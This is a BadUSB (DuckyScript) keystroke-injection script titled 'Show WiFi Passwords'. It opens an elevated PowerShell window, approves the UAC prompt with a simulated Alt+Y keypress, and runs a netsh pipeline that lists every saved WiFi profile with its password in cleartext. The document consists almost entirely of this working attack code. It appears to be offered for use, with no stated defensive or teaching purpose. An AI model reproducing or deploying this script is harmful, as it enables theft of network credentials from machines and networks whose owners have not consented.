REM ============================================
REM BadUSB Script: Show WiFi Passwords (Windows)
REM Extracts saved WiFi passwords
REM ============================================

DEFAULT_DELAY 100
DELAY 500

REM Open PowerShell as Admin
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500

REM Handle UAC prompt (click Yes with Alt+Y or just wait)
DELAY 1000
ALT y
DELAY 1000

REM Export WiFi profiles with passwords
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize
ENTER

REM Alternative: Simple version
REM STRING netsh wlan show profiles
REM ENTER
